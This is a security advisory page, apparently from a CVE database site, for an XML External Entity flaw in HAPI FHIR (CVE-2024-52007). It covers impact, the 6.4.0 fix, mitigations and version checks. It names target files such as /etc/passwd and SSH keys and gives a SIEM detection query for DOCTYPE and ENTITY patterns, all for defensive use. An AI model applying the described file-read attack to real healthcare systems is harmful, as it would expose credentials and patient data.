CVE-2024-52007
📋 TL;DR
This CVE describes an XML External Entity (XXE) vulnerability in HAPI FHIR's XSLT parsing components. Attackers can submit malicious XML files containing external entity references to read arbitrary files from the host system. This affects systems where external clients can submit XML to HAPI FHIR implementations.
💻 Affected Systems
- HAPI FHIR (org.hl7.fhir.core)
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise through file disclosure of sensitive files like /etc/passwd, SSH keys, configuration files, or database credentials, potentially leading to lateral movement and data exfiltration.
Likely Case
Unauthorized reading of sensitive system files containing credentials, configuration data, or patient healthcare information (PHI) in healthcare systems.
If Mitigated
Limited impact with proper network segmentation, input validation, and XML parser hardening preventing successful exploitation.
🎯 Exploit Status
Exploitation requires ability to submit XML to vulnerable endpoints. No public exploit code is known, but the vulnerability is straightforward to exploit given the XXE pattern.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.4.0
Vendor Advisory: https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-6cr6-ph3p-f5rf
Restart Required: Yes
Instructions:
1. Identify all HAPI FHIR deployments. 2. Check current version using dependency management tools. 3. Update org.hl7.fhir.core dependency to version 6.4.0 or later. 4. Rebuild and redeploy applications. 5. Restart affected services.
🧯 If You Can't Patch
- Implement strict input validation to reject XML containing DOCTYPE declarations or external entity references.
- Deploy network-level controls to restrict XML submission to trusted sources only and implement WAF rules to block XXE patterns.
🔍 How to Verify
Check if Vulnerable:
Check Maven/Gradle dependencies for org.hl7.fhir.core version <6.4.0. Review application code for XSLT parsing of external XML input.Check Version:
mvn dependency:tree | grep org.hl7.fhir.core OR gradle dependencies | grep org.hl7.fhir.coreVerify Fix Applied:
Verify org.hl7.fhir.core dependency is version 6.4.0 or higher in build configuration files (pom.xml, build.gradle).📡 Detection & Monitoring
Log Indicators:
- Unusual XML parsing errors, large XML file submissions, requests containing DOCTYPE or SYSTEM entity declarations in XML payloads.
Network Indicators:
- HTTP POST/PUT requests with XML content to FHIR endpoints, unusual file read patterns from application processes.
SIEM Query:
source="application_logs" AND (message="*DOCTYPE*" OR message="*ENTITY*" OR message="*XXE*")🔗 References
- https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#jaxp-documentbuilderfactory-saxparserfactory-and-dom4j
- https://cwe.mitre.org/data/definitions/611.html
- https://github.com/hapifhir/org.hl7.fhir.core/issues/1571
- https://github.com/hapifhir/org.hl7.fhir.core/pull/1717
- https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-6cr6-ph3p-f5rf
- https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-gr3c-q7xf-47vh
